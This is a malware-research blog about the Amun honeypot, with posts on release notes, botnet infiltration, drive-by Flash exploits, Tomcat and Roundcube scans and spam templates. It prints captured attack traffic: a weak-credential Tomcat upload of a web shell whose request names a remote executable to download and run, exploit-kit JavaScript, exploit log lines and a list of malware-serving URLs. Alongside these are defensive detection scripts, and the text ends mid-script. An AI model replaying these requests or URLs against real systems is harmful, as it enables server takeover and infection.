Virus Blog

Amun v0.1.9

— Posted by zeroq @ 22:12 - 04 Mar, 2010

After some bug fixes I decided that it is time for another file release, to keep up with the SVN version.
The tar archive can be downloaded from sourceforge as usual.

Changes in v0.1.9:

        - fixed wrong variable name in shellcode manager
        - fixed ftp_download core to allow login without password
        - modified plain ftp command shellcode detection
        - modified shellcode managers multiple file handling
        - modified furth shellcode decoder
        - modified ftp_nat_ip config parameter to accept dns names as well
        - modified match_plainFTP shellcode detector to accept decoded shellcode
        - modified vuln-ms08067 vulnerability
        - modified amun_smb_core
        - modified vuln-maxdb to ignore BitTorrent protocol requests
        - modified vuln-lsass to partly use amun_smb



Amun - Technical Report

— Posted by zeroq @ 19:41 - 14 Jan, 2010

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software, so others can understand it. Maybe now it is easier for others to contribute new modules. The PDF document is available here.

 

Abstract:
In this report we describe a low-interaction honeypot, named Amun, which is capable of capturing autonomous spreading malware from the internet. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities, the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local hard disk for further analysis. As a result, we are able to collect, ideally, previously unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.



CaptureHPC - detecting malicious websites

— Posted by zeroq @ 23:18 - 10 Dec, 2009
We are currently experimenting with the honeyclient solution CaptureHPC. We have written our own scheduler and client handler in Python and only use the Capture client application to monitor changes on the host. We still have some instability but things are getting better. We hope to release our code soon.
 
Our current setup consists of 3 CaptureHPC clients running in parallel. Our URL database is filled by extracting URLs from the Google search engine after searching for keywords retrieved from Google Trends.
We have detected the following URLs as malicious during the last few days (visit at your own risk):
 
www.icelebz.com/ celebs/ gisele_bundchen/ videos/
MD5: f4de2c9f6e6b3ff2e6d2fcd77b9e41ee - Mal/FakeAV-BP
www.experiencefestival.com/ forum/ news-vitamins/ 263373-vitamin-d-benefits-wwlp-22news.html 
MD5: 676399393b565ab1d4808600e337364a - TR/Dropper.Gen
www.gamesurge.com/ strategies/ Gameboy/ Walkthroughs-P/ Pokemon%20Missingno.shtml 
MD5: 0f0d609ddad379a65f7ad08323446ddf - Trojan-Spy.Win32.Zbot.gen
www.submitrightnow.com/ mindy_lawton_tiger_woods 
MD5: ab92cc8f7abeafffc9b588eda2f968cd - Trojan.Win32.Bredolab.Gen.1
izediotia.info/ cgi-bin/ ae 
MD5: 7231cf09b088a8fc4375aed27638f1d9 - Trojan:Win32/Alureon.DA
 
These URLs were all detected within the last four days. The scary thing is the low detection rate of current antivirus software. 


Monitoring the Waledac Botnet

— Posted by zeroq @ 22:53 - 12 Nov, 2009

We have just presented our work about monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a closer look inside the botnet, which is supposed to be the successor of the Storm Worm botnet. By analyzing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in August 2009. More information about the approach is presented in the paper.


Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.



Network Forensics Puzzle Contest

— Posted by zeroq @ 10:14 - 25 Aug, 2009

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

  1. What is the name of Ann's IM buddy?
  2. What was the first comment in the captured IM conversation?
  3. What is the name of the file Ann transferred?
  4. What is the magic number of the file you want to extract (first four bytes)?
  5. What was the MD5sum of the file?
  6. What is the secret recipe?

I won't tell you any solutions here, but I will tell you what tools I used to analyse the pcap file. The number one tool when it comes to pcap is in my opinion still tcpdump. It gives you a quick overview of what happened. Use the appropriate filter options to dump the complete packet content.
This will help you to answer the first few questions. You can also use Wireshark. Another nice tool I came across while investigating the file is tcpxtract. This tool extracts files out of a pcap file. With the help of this tool you are able to extract the file that was transferred, and a bunch of other files =)

To further investigate the instant messenger session I used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. However, in this case it did not reveal anything that was not already discovered using tcpdump, but it substantiates the earlier findings.

Another nice tool I used was Chaosreader. This tool generates a nice overview of who is communicating with whom and which protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.



Weak Passwords with Tomcat Installations

— Posted by zeroq @ 20:35 - 29 Jul, 2009

We noticed strange HTTP scans in the Amun Honeypot vulnerabilities.log file recently. We run Amun with Webserver emulation in order to catch certain attacks. What we found here are scans for Tomcat installations with a weak password.

The request for Tomcat installations looks like this:

GET /manager/html HTTP/1.1
Referer: http://xxx.xxx.241.29:80/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: xxx.xxx.xxx.29:80
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

The scans look for the manager application of Tomcat with the credentials set to admin:admin. Although Amun is not emulating this application, we could trigger the attack by just replying with 200 OK (standard HTTP). So, the next step in the attack we monitored is a POST request to the upload directory:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---------------------------072709230333828
Content-Length: 2495
Host: xxx.xxx.241.29
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://xxx.xxx.241.29:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=

-----------------------------072709230333828
Content-Disposition: form-data; name="deployWar"; filename="C:\\WINDOWS\\system32\\mui\\fexcep\\killfexcepshell.war"
Content-Type: application/x-zip-compressed
PK\x03\x04\x14\x00\x08\x00\x08\x003\x8cq:\x00
[...]

As we can see the attacker tries to upload a file named killfexcepshell.war to our honeypot. Amun does not recognize the attack, but it stores the hexdumps of unknown attack attempts to disk. We were therefore able to reconstruct the zip file from the hexdump. It extracts to the following files (directories):

WEB-INF
ok.jsp
META-INF
index.jsp

Unfortunately no further requests hit our honeypot, so we do not know what would have happened next. Googling for the filename, however, revealed a blog entry that is no longer reachable. Google Cache is your friend, though.

According to their investigation, after uploading the WAR file the attacker issues a GET request to the following URL:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe

The interesting part is the Cache-Vip-Url header pointing to some executable file on a Chinese web server. So what does index.jsp do? It rewrites the tomcat-users.xml file to read as follows:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1" />
<role rolename="manager"/>
<role rolename="admin"/>
<user username="admin" password="<hidden>" roles="admin,manager"/>
</tomcat-users>

The other operation index.jsp performs is to look for the above-mentioned Cache-Vip-Url HTTP header field and try to download and execute the referenced file. In case the compromised system is not Windows, the script aborts. Unfortunately we do not have a working URL to download the binary and check what it does. According to the above-mentioned blog entry, the malware is called PcClient, some kind of remote administration tool.

The ok.jsp file is just used to display the results of running index.jsp. The funny thing about index.jsp is that it contains a routine to generate a random password to be inserted into the tomcat-users.xml file. However, the randomly generated password is never used; it is just returned to the attacker, while the XML file gets a hardcoded password.
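The two requests quoted above contain everything a defender needs to spot this scan in plain HTTP traffic or honeypot dumps: the manager path, a Basic Authorization header that decodes to a default credential pair, and a multipart POST to the deploy endpoint. The following Python script is an added example written for this post; it is not part of Amun and not code from the attacker's WAR file. It parses a raw request head, decodes the Authorization header and flags the three indicators. The credential list beyond admin:admin, the sample requests and the 192.0.2.x addresses are assumptions constructed for the demonstration.

```python
import base64
import binascii
from typing import Dict, List, Optional, Tuple

# Credential pairs commonly tried against the Tomcat manager application.
# admin:admin is the pair seen in the honeypot requests above; the other
# entries are assumed well-known defaults added here for illustration.
WEAK_CREDENTIALS = {
    ("admin", "admin"),
    ("tomcat", "tomcat"),
    ("manager", "manager"),
    ("admin", ""),
}

MANAGER_PREFIX = "/manager/"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split the head of a raw HTTP request into method, path and a
    lower-cased header map (the body, if any, is ignored)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def decode_basic_auth(value: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an 'Authorization: Basic <b64>' value,
    or None if the header is absent, malformed or not Basic."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def assess(raw: str) -> List[str]:
    """Classify one request: manager probe, weak default credentials, WAR upload."""
    method, path, headers = parse_request(raw)
    findings: List[str] = []
    if not path.startswith(MANAGER_PREFIX):
        return findings
    findings.append("manager-probe")
    creds = decode_basic_auth(headers.get("authorization", ""))
    if creds is not None and creds in WEAK_CREDENTIALS:
        findings.append("weak-default-credentials:%s" % creds[0])
    if method == "POST" and "multipart/form-data" in headers.get("content-type", "").lower():
        findings.append("war-upload-attempt")
    return findings


# Constructed samples modelled on the two requests quoted in the post
# (placeholder addresses from the documentation range, not the real scanner).
SAMPLE_PROBE = (
    "GET /manager/html HTTP/1.1\r\n"
    "Host: 192.0.2.29:80\r\n"
    "Connection: Close\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    "\r\n"
)
SAMPLE_UPLOAD = (
    "POST /manager/html/upload HTTP/1.0\r\n"
    "Host: 192.0.2.29\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------072709230333828\r\n"
    "Content-Length: 2495\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    "\r\n"
    "-----------------------------072709230333828\r\n"
    'Content-Disposition: form-data; name="deployWar"; filename="shell.war"\r\n'
)
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: 192.0.2.29\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_PROBE, SAMPLE_UPLOAD, SAMPLE_BENIGN):
        print(sample.split("\r\n", 1)[0], "->", assess(sample) or ["clean"])
```

Because Basic authentication sends the credentials in the clear, the same decoding works on any captured request, which is also why the mitigation is simply not to expose the manager application with a guessable password in tomcat-users.xml.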



Amun v0.1.8

— Posted by zeroq @ 09:12 - 27 Jul, 2009

Although i was not able to finish everything i had planned for the new version, due to lack of time, i decided to release it anyway. So Amun v0.1.8 has a lot of fixes, modifications, and additional stuff. Feedback is always welcome. Documented changes are the following:

Changes in v0.1.8:
        - added ulm shellcode handler
        - added bergheim shellcode handler
        - added langenfeld connectback2
        - added leimbach encoded tftp command detection
        - added pexalphanumeric b64encoded plain url detection
        - added new amun smb handler
        - fixed netdde vulnerability
        - fixed missing socket import for log-blastomat module
        - fixed reply function to send all bytes
        - fixed amun crash on already used port/address
        - fixed anubis submission module
        - fixed amun ftp NAT download
        - modified ftp_download_core to handle broken pipe on push command
        - modified vuln-http to serve images from folder
        - modified log-surfnet configuration to accept database port
        - modified vuln-arc to no reply
        - modified md5 to hashlib (deprecated warning)
        - modified popen2 to subprocess (deprecated warning)
        - removed conn= parameter prefix for asynchat.async_chat.__init__



Visual Analysis of Malware Behavior

— Posted by zeroq @ 17:38 - 26 Jun, 2009

As my colleague Philipp already mentioned in his blog, our short paper about the visualization of malware behaviour has been accepted at this year's VizSec Workshop (11 October, Atlantic City, NJ, USA).

We use transformed sandbox reports as a visualization basis. The recorded malware behaviour is displayed in different ways to aid malware researchers. I will blog more on this topic as soon as the workshop is over. 



Glastopf Webhoneypot Version 0.2.0

— Posted by zeroq @ 14:01 - 14 Jun, 2009

Lukas from Glasblog released a new version of his webhoneypot called Glastopf yesterday. Several new modules have been implemented including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.

A web honeypot can be used to detect remote/local file inclusion attacks against current web applications, such as phpMyAdmin or the Roundcube webmailer. The honeypot simulates several vulnerable web applications and extracts injected commands from the incoming requests. A request can, for example, try to load another file from a remote server that is already under the control of the attacker and execute it in the context of the web server. In some cases these remotely loaded files contain IRC bots that allow the attacker to take control of the attacked system. Other methods to compromise the system include gathering information about the running operating system and then including a local root exploit to take complete control over the server.



Amun: NetDDE Reloaded

— Posted by zeroq @ 20:54 - 09 Jun, 2009
I am currently working on the CIFS simulation of Amun, so requests to vulnerabilities like NetDDE, LSASS, or MS08067 can be correctly answered. First results are promising: although the documentation of the protocol is not the best, I managed to simulate a Windows 2000 for the NetDDE vulnerability (MS04031) well enough to finally trigger current exploits in the wild. I also had to add a new shellcode decoder detection pattern in order to recognize the shellcode used in sample exploits available on the internet.

So far I was able to capture two attacks from different hosts against the NetDDE vulnerability:
exploit 137.118.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])

exploit  72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])


Unfortunately only one download worked, the second one. The malware has the MD5 hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is a Virut/Rbot variant, which is already well detected by current anti-virus engines.

I have just started to integrate the new CIFS simulation with the MS08067 vulnerability emulation, but I am not yet finished. I will also update the other vulnerability modules so that they rely on a working simulation rather than on random reply bytes with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.


Towards Proactive SPAM Filtering

— Posted by zeroq @ 00:02 - 09 Jun, 2009
We are currently working on some techniques for SPAM template generation. That means we try to generate templates that match a certain SPAM run of a certain bot. To achieve this we run several bots in a monitored network environment, also called a sandnet. We collect all outgoing email and try to build a regular expression matching as many emails belonging to a single SPAM run as possible. If a newly added email alters the current template too much, it is skipped and our process starts to generate a new template with this email as starting point.

First results seem to be promising, as a rather small number of emails suffices to generate a template matching the complete SPAM run. Unfortunately our current approach does not work as soon as permutation of sentences or paragraphs is used in the SPAM text. The template then tends to get too general and would therefore also match regular emails. We are currently working on ways to circumvent this drawback.
 
Templates are to be distributed to end users to verify incoming email against them. As end users do not check their email too frequently, templates should be there in time to prevent all email of a certain SPAM run. We were not able to verify this step yet, but are working on it.

We will give a short talk about this topic at this year's DIMVA conference in Milan, Italy on July 9th.
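To make the template idea concrete, here is an added Python example written for this post; it is not the group's own implementation and its token-level alignment with difflib, the "skip if more than half of the literal tokens would be lost" rule and the sample mails are all assumptions. Each email is folded into the current template, every region that differs becomes a single wildcard, and an email that would wipe out too much of the template starts a new one, which is also what keeps an unrelated legitimate message from turning the spam template into something that matches everything.

```python
import difflib
import re
from typing import List

# Marker for "anything here"; never occurs in real email text.
WILDCARD = "\x00*"


def tokens(text: str) -> List[str]:
    return text.split()


def merge(template: List[str], email: List[str]) -> List[str]:
    """Align one email against the template and replace every differing
    region (including regions that were already wildcards) with a single
    wildcard token, so the template only keeps what both share."""
    sm = difflib.SequenceMatcher(a=template, b=email, autojunk=False)
    merged: List[str] = []
    for tag, i1, i2, _j1, _j2 in sm.get_opcodes():
        if tag == "equal":
            merged.extend(template[i1:i2])
        elif not merged or merged[-1] != WILDCARD:
            merged.append(WILDCARD)
    return merged


def literal_count(template: List[str]) -> int:
    return sum(1 for t in template if t != WILDCARD)


def build_templates(emails: List[str], min_keep: float = 0.5) -> List[List[str]]:
    """Greedy construction: fold each email into the current template; if
    that would drop more than (1 - min_keep) of the template's literal
    tokens, the email does not belong to this run and starts a new one."""
    templates: List[List[str]] = []
    current: List[str] = []
    for mail in emails:
        toks = tokens(mail)
        if not current:
            current = toks
            continue
        candidate = merge(current, toks)
        if literal_count(candidate) < min_keep * literal_count(current):
            templates.append(current)
            current = toks
        else:
            current = candidate
    if current:
        templates.append(current)
    return templates


def to_regex(template: List[str]) -> "re.Pattern":
    """Compile the template into the regular expression handed to clients:
    literals separated by whitespace, wildcards as non-greedy gaps."""
    pattern = r"^\s*"
    for idx, tok in enumerate(template):
        if idx:
            both_literal = template[idx - 1] != WILDCARD and tok != WILDCARD
            pattern += r"\s+" if both_literal else r"\s*"
        pattern += r".*?" if tok == WILDCARD else re.escape(tok)
    return re.compile(pattern + r"\s*$", re.DOTALL)


def show(template: List[str]) -> str:
    return " ".join("<*>" if t == WILDCARD else t for t in template)


# Constructed sample: three mails from one (fictional) spam run plus one
# legitimate message that must not be folded into the spam template.
SAMPLE_EMAILS = [
    "Dear John, buy cheap pills at http://ex1.example/ today only 50% off",
    "Dear Mary, buy cheap pills at http://ex2.example/ today only 50% off",
    "Dear Bob, buy cheap pills at http://ex3.example/ today only 70% off",
    "Meeting tomorrow at 10am in room 42, please confirm",
]

if __name__ == "__main__":
    for t in build_templates(SAMPLE_EMAILS):
        print(show(t), "=>", to_regex(t).pattern)
```

The failure mode described in the post shows up directly in this code: if two mails carry the same sentences in a different order, the alignment keeps only the longest common run and the rest collapses into wildcards, so literal_count drops and the template becomes too general to be useful as a filter.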


Visualization

— Posted by zeroq @ 14:06 - 05 Apr, 2009

While looking at different visualization tools, I came across circos. It creates really cool images, although the readability is not always the best. Following is an image presenting the top 25 countries of remote file inclusion attackers and the countries they attacked.

Let's see what other cool pictures we can generate from the data we have collected so far.



Tutorial: HowTo Setup Amun Honeypot

— Posted by zeroq @ 21:08 - 13 Mar, 2009

There is a great tutorial about how to set up an Amun honeypot using Debian Lenny at botnetz.com.
It is written in German, but it should be easy to guess what to do even if you don't understand German.

The main parts are covered, so for those who want to get started it is very helpful. Thanks Duke for the great tutorial!

Update: An English version is available as of recently: here



Collecting RFI Data

— Posted by zeroq @ 11:06 - 10 Mar, 2009

While thinking about current remote file inclusion (RFI) honeypot solutions, we came to the conclusion that, instead of asking system administrators to download, install and configure a honeypot, we could simply have them redirect RFI requests to our already running honeypots.

If you are interested in sharing remote file inclusion requests hitting your webserver with us, you can use the following .htaccess file:

Options +FollowSymlinks
RewriteEngine on
RewriteCond %{QUERY_STRING} (.+=http:\/\/.+)
RewriteRule ^(.+)$ http://link.informatik.uni-mannheim.de/$1?%1 [R,NC]

The rule set checks whether any variable in the client's GET query string carries an http:// URL as its value (RewriteCond). If so, the request is redirected to our web server (RewriteRule), with the requested path and the matched query string appended. If you have any questions, comments or suggestions, do not hesitate to contact us.



Honeypot Experiment

— Posted by zeroq @ 13:16 - 07 Mar, 2009

I am thinking about a honeypot experiment to detect whether attacks are really global or more local. For this reason I wrote a log-experiment module for the Amun honeypot, for those willing to participate. The module writes a log file similar to the exploit.log but without the IP address of the attacked host, so the information stored is the attacker IP, the destination port, the vulnerability exploited and the download URL found in the shellcode.

For those who want to participate, I would like you to install Amun and the log module, collect data for a couple of weeks and then send me the logs created by the log-experiment module. Other honeypot solutions are welcome as well, as long as they provide similar data.

To participate just write me an email to zero-q @ iname.com. It would be great if you can tell me at least the country where the honeypot is positioned, so I can determine how "global" the evaluation will be in the end. Thanks.



Amun v0.1.7

— Posted by zeroq @ 15:35 - 19 Feb, 2009

After some updates and fixes it was time for another release (sourceforge download). So here are the changes:

Changes in v0.1.7:
        - added new bindshell detection
        - added log-surfnet modul
        - added amun sql layout amun_db.sql
        - added vuln-ms08067 modul (milworm)
        - added bielefeld encoded URL detection
        - fixed linkbot dlident missing
        - modified currentSockets to store attackerId for log-surfnet
        - modified vuln-dcom to detect other exploit method
        - modified vuln-http POST request shellcode size to 530
        - modified download_core to handle errors



Driving by my Flash File

— Posted by zeroq @ 18:02 - 07 Feb, 2009

I recently stumbled across an article at the Internet Storm Center about (v9/10) Flash files (SWF) which exploit your browser and install a World of Warcraft password stealer. So let's take a closer look at what happens there. The URL which serves the SWF files is hxxp://www_svc7_com/1.html (don't visit the site unless you know what you are doing).

What I did was a simple wget with a disabled user-agent string to retrieve the 1.html. This file contains some JavaScript code to determine the visiting browser and then includes another file in an iframe. Part of the script looks like this:

[...]
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
  document.write('<iframe src="b.asp" width=0 height=0></iframe>');
} else {
  document.write('<EMBED src="dadongf.swf" width=0 height=0>');
}
[...]

Thus, if Internet Explorer is used, the b.asp file is included, otherwise dadongf.swf. So let's take a closer look at the ASP file: it includes further JavaScript code to determine the Flash Player version running. At the time of this writing the ASP file checks whether the major player version is 9, then checks the minor version and serves a different SWF file for each minor version. Thus, Flash Players of version 8 or earlier, or version 10 and higher, are not exploited. Following is a part of the ASP file:

[...]
if (version['major'] == 9)
{                       
  document.getElementById('flashversion').innerHTML = "";
  // 9e
  if (version['rev'] == 115)
  {                            
    var so = new SWFObject("./9e.swf", "mymovie", "0.1", "0.1", "9", "#000000");
    so.write("flashcontent");
    document.write('<EMBED src="9e10.swf" width=0 height=0>');
  }
  // 9c/d
  else if (version['rev'] == 47)
  {
    var so = new SWFObject("./47.swf", "mymovie", "0.1", "0.1", "9", "#000000");
    so.write("flashcontent");                     
  }
[...]

All in all, the script checks for seven different minor versions of Flash Player version 9 and serves a different SWF file accordingly. The next step is to download the SWF files and see if we can find any malicious download URLs within. To retrieve the files we use wget again.

As already mentioned in the Internet Storm Center article, the swfdump tool does not work with SWF files of version 9 and greater, so we take another tool called flasm. The tool can decompress the compressed Flash file for us. Thus we use the following command to decompress the SWF files:

       flasm -x 9e.swf

The resulting decompressed file can then be analyzed with the Linux tool strings to retrieve any printable data. Following is the information we were looking for right from the start: a URL to the actual malware binary, the World of Warcraft password stealer.

       hxxp://vjd6_cn/lo/bigfots_exe

The Virustotal report for this file can be found at Virustotal
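The decompress-then-strings step can be done without flasm, because the only thing standing between strings and a version 9 file is the zlib layer of the CWS container. The Python below is an added example for this post, not code from the post or from the flasm project: it builds a small constructed CWS sample, inflates it the way flasm -x does, and pulls printable strings and URLs out of the result, printing them in the same hxxp/underscore notation the post uses. The sample body and the dropper.example host are constructed placeholders, not the files or URL analysed above.

```python
import re
import struct
import zlib
from typing import Dict, List


def build_sample_cws(body: bytes, version: int = 9) -> bytes:
    """Constructed sample only: wrap `body` in a CWS container. An SWF starts
    with an 8-byte header (3-byte signature, 1-byte version, 4-byte little-
    endian length of the uncompressed file); in a CWS file everything after
    the header is zlib-compressed."""
    header = b"CWS" + bytes([version]) + struct.pack("<I", 8 + len(body))
    return header + zlib.compress(body)


def decompress_swf(data: bytes) -> bytes:
    """Return the file with its body inflated (the step 'flasm -x' performs)."""
    sig = data[:3]
    if sig == b"FWS":
        return data
    if sig == b"CWS":
        return data[:8] + zlib.decompress(data[8:])
    if sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF (version 13 and later); not handled here")
    raise ValueError("not an SWF file")


def swf_version(data: bytes) -> int:
    return data[3]


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII, like the 'strings' tool would print."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")


def extract_urls(data: bytes) -> List[str]:
    return [u.decode("ascii") for u in URL_RE.findall(data)]


def defang(url: str) -> str:
    """Same notation the post uses so a URL cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "_")


def analyze_swf(data: bytes) -> Dict[str, object]:
    """Version, container type and defanged URLs found in the inflated file."""
    plain = decompress_swf(data)
    return {
        "version": swf_version(plain),
        "compressed": data[:3] == b"CWS",
        "urls": [defang(u) for u in extract_urls(plain)],
    }


# Constructed body: a few header-like bytes, a short label and one embedded
# download URL (placeholder host, not the one from the post).
SAMPLE_BODY = (
    b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00"
    b"\x3f\x03\x40\x00\x00\x00"
    b"loader\x00"
    b"http://dropper.example/lo/payload.exe\x00"
    b"\x00\x00"
)

if __name__ == "__main__":
    sample = build_sample_cws(SAMPLE_BODY)
    print(analyze_swf(sample))
    print(printable_strings(decompress_swf(sample)))
```

Running strings on the compressed file directly finds nothing useful, which is exactly why the decompression step is needed; a real sample may also hide the URL inside obfuscated ActionScript, in which case string extraction alone will not reveal it.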



Some thoughts about the future

— Posted by zeroq @ 13:03 - 18 Jan, 2009

With the introduction of IP version 6 getting closer and closer, the classical search, find and compromise tactics will surely fade away. Thus attackers will shift to more client-side exploitation in order to compromise new machines. With this trend, services like email, DNS servers, and network routing infrastructure will be the number one targets in the future. For this reason I expect SPAM to increase, as it is the easiest way to reach new victims without much effort. Vulnerabilities in email clients and malicious attachments are already increasing in today's email traffic.

As IPv6 heavily relies on a working DNS infrastructure, attacks on DNS servers will increase as well. An attacker who controls a DNS server controls all clients using this server. With the help of compromised DNS servers attackers can direct victims to prepared websites exploiting vulnerabilities in browsers, or harvest user credentials with the help of phishing sites. With the compromise of network infrastructure such as switches or routers things will get even worse. Thus it is of interest to develop tools to detect, monitor and understand attacks on DNS and network infrastructure, as well as to find a solution for the ever-increasing number of SPAM messages filling the inboxes.



Webmail Roundcube Scanning

— Posted by zeroq @ 10:03 - 16 Jan, 2009
We are monitoring quite a few scans for the Roundcube webmail software at our low-interaction honeynet running Amun (latest SVN version). Scans seen so far target two vulnerabilities, as reported by the Internet Storm Center as well. In the past months (October 2008 to December 2008) we saw six different IP addresses: two from England, one from China, one from Guatemala, one from the US, and one from Germany. The two from England scanned for the html2text file, the others for msgimport.

The first request looks like this:
HEAD /roundcube/bin/html2text.php HTTP/1.0
HEAD /mail/bin/html2text.php HTTP/1.0
HEAD /webmail/bin/html2text.php HTTP/1.0

According to CVE a vulnerability in html2text.php in roundcube versions 0.2-1 alpha and 0.2-3 beta allows arbitrary remote code execution.

The other request looks like this:
GET /roundcube//bin/msgimport HTTP/1.1
GET /bin/msgimport HTTP/1.0
GET /mail/bin/msgimport HTTP/1.0
GET /webmail/bin/msgimport HTTP/1.0

Interestingly, all scans for msgimport have the user agent string set to "Toata dragostea mea pentru diavola", whereas the html2text scans do not set any user agent string at all. Sounds like some automated tool to me.
More information on this can be found at the Internet Storm Center.
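Anyone running a web server can look for the same two scan types in ordinary access logs. The Python below is an added example written for this post (it is not part of Amun): it parses Apache combined-format log lines, matches the HEAD probes for bin/html2text.php and the GET probes for bin/msgimport under any installation prefix, and groups the hits by source address and User-Agent so the "no user agent" versus "Toata dragostea mea pentru diavola" split described above becomes visible. The log format, the signatures and the sample lines with documentation-range addresses are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, Optional, Set

# Apache "combined" log layout (assumed here; adjust the pattern to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures for the two scan types described in the post: a HEAD probe for
# bin/html2text.php and a GET for bin/msgimport, whatever the install prefix.
SIGNATURES = {
    "roundcube-html2text": ("HEAD", re.compile(r"/bin/html2text\.php$")),
    "roundcube-msgimport": ("GET", re.compile(r"/bin/msgimport$")),
}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one log line into its fields, or None if it does not fit the format."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Name of the first signature the request matches, or None."""
    for name, (method, path_re) in SIGNATURES.items():
        if entry["method"] == method and path_re.search(entry["path"]):
            return name
    return None


def scan_report(lines: Iterable[str]) -> Dict[str, Dict[str, Set[str]]]:
    """Group matching requests by signature, collecting distinct source
    addresses and User-Agent strings ("-" is Apache's value for none)."""
    report: Dict[str, Dict[str, Set[str]]] = defaultdict(
        lambda: {"sources": set(), "user_agents": set()})
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        name = classify(entry)
        if name is not None:
            report[name]["sources"].add(entry["ip"])
            report[name]["user_agents"].add(entry["ua"])
    return dict(report)


# Constructed log lines mirroring the request paths quoted in the post; the
# addresses are documentation-range placeholders, not the scanners observed.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2008:04:12:01 +0100] "HEAD /roundcube/bin/html2text.php HTTP/1.0" 404 - "-" "-"',
    '198.51.100.7 - - [10/Dec/2008:04:12:02 +0100] "HEAD /mail/bin/html2text.php HTTP/1.0" 404 - "-" "-"',
    '203.0.113.5 - - [11/Dec/2008:22:40:10 +0100] "GET /roundcube//bin/msgimport HTTP/1.1" 404 287 "-" "Toata dragostea mea pentru diavola"',
    '203.0.113.5 - - [11/Dec/2008:22:40:11 +0100] "GET /webmail/bin/msgimport HTTP/1.0" 404 287 "-" "Toata dragostea mea pentru diavola"',
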